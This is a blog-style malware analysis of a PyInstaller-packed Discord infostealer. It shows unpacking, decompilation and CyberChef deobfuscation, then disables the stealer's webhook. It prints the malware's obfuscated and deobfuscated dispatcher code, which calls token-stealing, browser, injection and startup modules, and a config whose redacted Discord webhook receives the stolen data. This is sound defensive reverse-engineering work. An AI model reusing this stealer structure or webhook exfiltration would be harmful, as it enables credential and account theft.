Pyinstaller Reverse Engineering

May 22, 2023

8 mins read

In this post, I’ll use pyinstxtractor and pycdc in order to reverse engineer a Discord infostealer written in Python3.10 wrapped with PyInstaller. I’ll then use CyberChef to further deobfuscate the malware and learn about the wonders of open source. Lastly, I’ll abuse some interesting Discord design decisions to effectively kill the malware.

The story

Recently, a friend’s discord account was hacked. They started messaging everyone the link http://redacted.com/redactedmalware, claiming it was a way to earn free robux or something: targets Shocker: It’s malware. What kind of malware, exactly? I was curious if I could reverse engineer it. I started off by running strings on it, and pretty quickly found some indicators of PyInstaller: targets If you don’t know what PyInstaller is, it’s a Python package meant to pack Python .py scripts into a single .exe file. This provides a (minor) layer of obfuscation along with the user not needing Python to run the program. If we want to view the Python source code, we’ll have to convert the .exe back to the original .py files. How?

Part 1: From .exe to .py

Some research brought me to this GitHub repository, claiming to extract the contents of a PyInstaller exe. It works! Download the script, and run python3 pyinstxtractor.py file.exe. It’ll output the extracted contents in file.exe_extracted: targets We’re not done just yet. As the program says, we only have .pyc file, not .py files: targets .pyc files are the compiled bytecode of a .py program. This means we still can’t read the source code. Luckily, since this is bytecode (instead of machine code), we can accurately reverse the .pyc files back to their original .py files with another program!

Part 1.5: From .pyc to .py

There are some more popular .pyc decompilers out there like uncompyle6 that you think might work on these, but they actually don’t: targets This is because they’re outdated. uncompyle6, for instance, only works up to Python 3.8. Our code is Python 3.10! We need to find a program supporting more recent versions of Python. Luckily, one exists: pycdc/decompyle++. There are no binaries we can download, but compiling is pretty easy:

git clone https://github.com/zrax/pycdc
cd pycdc
cmake .
make
./pycdc -h

We can try it with ./pycdc source.py, and it almost works: targets It clearly starts printing out some of the source code but it errors out with Unsupported opcode: CALL_FUNCTION_EX.

Part 1.75: Fixing ‘opcode’ errors

Some more googling and I find this savior of a github comment. We have to change a little bit of code, but it’s nothing crazy. Pretty much, every time we encounter an opcode error:

  • Open ASTree.cpp and scroll to line 1200, where there should be a big set of case statements like so: targets (if you are reading this in the far future, it might not be at this line anymore. check the commit history)
  • Copy your unsupported opcode, and add it to the list of case statements. For instance, my unsupported code was CALL_FUNCTION_EX and I added the line case Pyc::CALL_FUNCTION_EX_A:
  • Recompile the program with make, and try the decompilation again. If you get another opcode error, repeat the same thing. Once you add enough, it’ll fully decompile it, and we now have our source main.py file!

Part 2: Reverse Engineering

There’s some obfuscation in the source code itself, but luckily it’s pretty bad. Here’s the main.py file, if you want to try and reverse it before I explain how:

# Source Generated with Decompyle++
# File: main.pyc (Python 3.10)

from components.antidebug import AntiDebug
from components.browsers import Browsers
from components.discordtoken import DiscordToken
from components.injection import Injection
from components.startup import Startup
from components.systeminfo import SystemInfo
from config import __CONFIG__

def main():
Warning: Stack history is not empty!
Warning: block stack is not empty!
    funcs = [
        AntiDebug,
        Browsers,
        DiscordToken,
        Injection,
        Startup,
        SystemInfo]
    for func in funcs:
        if __CONFIG__[func.__name__.lower()]:
            
            try:
                if [
                    iter(__import__('base64').b64decode(__import__('zlib').decompress(b'x\xda\xf3\x0bq4\x05\x00\x02\xef\x01\x19')).decode())] * 3 or int.from_bytes == map((lambda O, i: 511 - int(O) + i)(map, __import__('base64').b64decode(__import__('zlib').decompress(b'x\xda\x03\x00\x00\x00\x00\x01')).decode().join(zip, [
                    iter(__import__('base64').b64decode(__import__('zlib').decompress(b'x\xda\xf3\x0bq4\x05\x00\x02\xef\x01\x19')).decode())] * 3), range(1)), __import__('base64').b64decode(__import__('zlib').decompress(b'x\xdaKr\xcf1Hq\xaf\xc8\x01\x00\x0cB\x02\xd5')).decode(), False, **('signed',)):
                    func(__CONFIG__[__import__('base64').b64decode(__import__('zlib').decompress(b'x\xdaK1\n\xcbLt\xb7,K,\xb7\xb5\x05\x00\x1a,\x03\xff')).decode()])
                else:
                    func()
            finally:
                continue
                if Exception:
                    e = None
                    
                    try:
                        print(__import__('base64').b64decode(__import__('zlib').decompress(b'x\xda\x0b\x8a\xf0\xaaL2\xf6LO\x0c7IO560\xf3\xf4(\xb1\x04\x00D_\x06B')).decode().format(func.__name__, e))
                    finally:
                        e = None
                        del e
                        continue
                        e = None
                        del e
                        if None:
                            if None:
                                continue
                                return None



if __name__ == __import__('base64').b64decode(__import__('zlib').decompress(b'x\xda\x8b0\xb4,\x89\x0c\xcf)\x8d0\xb4\xb0\x05\x00\x19/\x03\xc6')).decode():
    main()
    return None

We see a bunch of the same thing: __import__('base64').b64decode(__import__... ending with a bytestring. We can decode each of these in the Python interpreter, but that’s a little slow: targets Is it possible to automatically deobfuscate all of this without any risk to my VM?

Part 2.5: Automatic Deobfuscation with CyberChef

Yes! We can use CyberChef to automatically decode all of them for us. The following recipe will deobfuscate a single bytestring targets Of course, this is just as slow as the Python interpreter version, given that we still have to copy+paste every one in. To decode every single one of them at once, we can use the Subsection operation. This operation takes in a regex, and anything matching the regex at the time the operation is run will have future operations performed on it. For instance: targets Here, we’ve set our subection regex to match for base64 strings, then we decode every match as base64. This lets us decode base64 strings while keeping other parts of the text intact. We’ll do the same with our malware, just with a few more steps. To achieve this same effect on our malware, we can set our regex to match the entire __import__('base64....decode() part, strip everything off but the bytestring, then do the unescape/zlib/base64 like we just did. The following recipe does just that:

Subsection('__import__\\(\'base64\'\\).b64decode\\(__import__\\(\'zlib\'\\).decompress\\(b[\'"].*?[\'"]\\)\\).decode\\(\\)',true,true,false)
Drop_bytes(0,63,false)
Find_/_Replace({'option':'Regex','string':'\'\\)\\).decode\\(\\)'},'',true,false,true,false)
Unescape_string()
Zlib_Inflate(0,0,'Adaptive',false,false)
From_Base64('A-Za-z0-9+/=',true,false)
Merge(true)

This works, and here’s the semi-deobfuscated code. It’s not 100%, but it’s definitely good enough:

from components.antidebug import AntiDebug
from components.browsers import Browsers
from components.discordtoken import DiscordToken
from components.injection import Injection
from components.startup import Startup
from components.systeminfo import SystemInfo
from config import __CONFIG__

def main():
Warning: Stack history is not empty!
Warning: block stack is not empty!
    funcs = [
        AntiDebug,
        Browsers,
        DiscordToken,
        Injection,
        Startup,
        SystemInfo]
    for func in funcs:
        if __CONFIG__[func.__name__.lower()]:
            
            try:
                if [
                    iter(509)] * 3 or int.from_bytes == map((lambda O, i: 511 - int(O) + i)(map, .join(zip, [
                    iter(509)] * 3), range(1)), little, False, **('signed',)):
                    func(__CONFIG__[webhook])
                else:
                    func()
            finally:
                continue
                if Exception:
                    e = None
                    
                    try:
                        print(Error in {}: {}.format(func.__name__, e))
                    finally:
                        e = None
                        del e
                        continue
                        e = None
                        del e
                        if None:
                            if None:
                                continue
                                return None



if __name__ == __main__:
    main()
    return None

There are a couple things I immediately notice:

  • A webhook is being loaded from some config script
  • It runs a couple clearly malicious functions like DiscordToken, Startup, Inject etc etc.

Let’s start with that DiscordToken part first. Looking at the third line, it gets that function by loading the DiscordToken function from the components.discordtoken library. This means the code being ran is in a different file discordtoken.pyc the malware includes that we need to decompile. I found it with find . -name 'discordtoken.pyc' and ran pycdc on it like normal. targets This file is much, much bigger. Looking at the deobfuscated code, I see something interesting at the bottom: targets A github link? And a name ‘Empyrean’? What’s this?

Part 2.7: Open-Source Malware

Just when you’ve thought you’ve seen it all. That github link is to an ‘‘’educational purpose only’’’ infostealer. So, this malware is actually just some script kiddie stealing already-existing malware (in python? really??) and configuring it to send the data to them. There’s not much more reason to deobfuscate this when the source is right here. The wonders of open-source, I guess.

Part 3: Stopping the Scam

We aren’t done just yet! Let’s look at that config file I mentioned earlier.

# Source Generated with Decompyle++
# File: config.pyc (Python 3.10)

__CONFIG__ = {
    systeminfo: True,
    startup: True,
    injection: True,
    discordtoken: True,
    browsers: True,
    antidebug: True,
    webhook: https://discordapp.com/api/webhooks/[REDACTEDID]/[REDACTED] }

At the very end we get a juicy webhook. Once the malware finishes running, all your data is sent to this webhook, meaning it pops up in Mister Skid’s discord server. And interestingly enough (this is intended), sending a HTTP DELETE request to this endpoint deletes the webhook. Completely unauthenticated! If you don’t believe me, here’s an example webhook I made: targets Now, I’ll copy this webhook link, and send a DELETE request to it with CURL. Again, clearly no authentication is being done here: targets And if we go back: targets It’s gone! So, I don’t have the screenshot, but I quickly sent a delete request to the malware’s webhook and now it’s gone. Since the webhook is gone, that means the program has nothing to send the stolen data to and is essentially dormant on the computer.

Sharing is caring!